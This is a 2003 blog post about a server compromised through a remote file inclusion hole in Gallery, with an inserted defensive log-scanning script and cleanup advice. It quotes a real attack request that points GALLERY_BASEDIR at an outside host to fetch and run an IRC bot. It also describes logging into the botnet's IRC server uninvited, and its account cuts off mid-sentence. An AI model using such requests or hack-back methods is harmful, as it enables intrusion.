fight hax0rz with hax0rz
Posted on Thu, May 22 2003

I noticed some odd script kiddie-style hits on my website earlier today to my Gallery page, but from what I saw they all 404ed. Later on, I noticed an odd program running on my server called 'vb.pl'. It turns out I missed one of those suspicious hits, and they had been able to run a program on my machine.
I poked around to see if I could find the program they were running on my drives, but to no avail. I looked into that hit that didn't 404:

    202.148.160.6 - - [22/May/2003:10:57:17 -0500] "GET /errors/configmode.php?GALLERY_BASEDIR=http://hacked.mail333.com/g12/vb/ HTTP/1.0" 200 19

Well, there's the "vb" part. After poking around a bit, it turns out to be a vulnerability in Gallery. Lovely. I looked at the script that got hacked, and found that it caused this to be executed. Hmm.. not surprising, it's a zombie IRC bot that logs onto a private server and offers shell access to your machine to its masters. The script gets killed on my box, but my curiosity took over.
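A check a defender can run over the access log for a hit like the one above, added here as an example and not from the original post: it parses Apache log lines and flags any request whose GALLERY_BASEDIR parameter points at a remote URL, keeping the status code so the attempts that did not 404 stand out. The sample log is constructed around the line quoted above; the parameter name comes from that line.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache common/combined log line, in the shape of the hit quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Sample log (constructed). Line 1 is the request quoted above; the other
# two are made up to show a probe that 404ed and a benign local value.
SAMPLE_LOG = [
    '202.148.160.6 - - [22/May/2003:10:57:17 -0500] '
    '"GET /errors/configmode.php?GALLERY_BASEDIR=http://hacked.mail333.com/g12/vb/ HTTP/1.0" 200 19',
    '202.148.160.6 - - [22/May/2003:10:55:02 -0500] '
    '"GET /gallery/errors/configmode.php?GALLERY_BASEDIR=http://hacked.mail333.com/g12/vb/ HTTP/1.0" 404 282',
    '10.0.0.7 - - [22/May/2003:11:02:41 -0500] '
    '"GET /errors/configmode.php?GALLERY_BASEDIR=/var/www/gallery/ HTTP/1.0" 200 19',
]

REMOTE_SCHEMES = ("http", "https", "ftp")


def remote_include_hits(lines, params=("GALLERY_BASEDIR",)):
    """Return (ip, timestamp, param, value, status) for every request that
    sets one of `params` to a remote URL. parse_qs percent-decodes the
    value, so an encoded "http%3A%2F%2F" is caught as well."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        query = urlsplit(m.group("path")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name not in params:
                continue
            for value in values:
                if urlsplit(value).scheme in REMOTE_SCHEMES:
                    hits.append((m.group("ip"), m.group("ts"), name,
                                 value, int(m.group("status"))))
    return hits


def served_hits(hits):
    """The attempts that did not fail: these reached the vulnerable script,
    so the box should be checked for a running bot."""
    return [h for h in hits if h[4] < 400]


if __name__ == "__main__":
    for ip, ts, name, value, status in remote_include_hits(SAMPLE_LOG):
        print(f"{status} {ip} {ts} {name}={value}")
```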
I used the hardcoded info at the top of that script to log on to the IRC site. It turns out that there were hundreds of servers that had been hacked. I saw the folks who were controlling them logged on, but idle for a few hours. Hmm. I could have just left well enough alone, but I hadn't yet done my good deed of the day, and it was getting late.
I did some reverse engineering of the script to learn how the bots were being controlled. You first need to send it a
Script kiddies are cute.

Update: I'm getting questions about what to do if you're hacked with this. First of all, kill off the "vb.pl" immediately. Next, remove all instances of the Gallery files /errors/configmode.php, publish_xp.php and publish_xp_docs.php. Finally, figure out if they hacked the rest of your machine. :)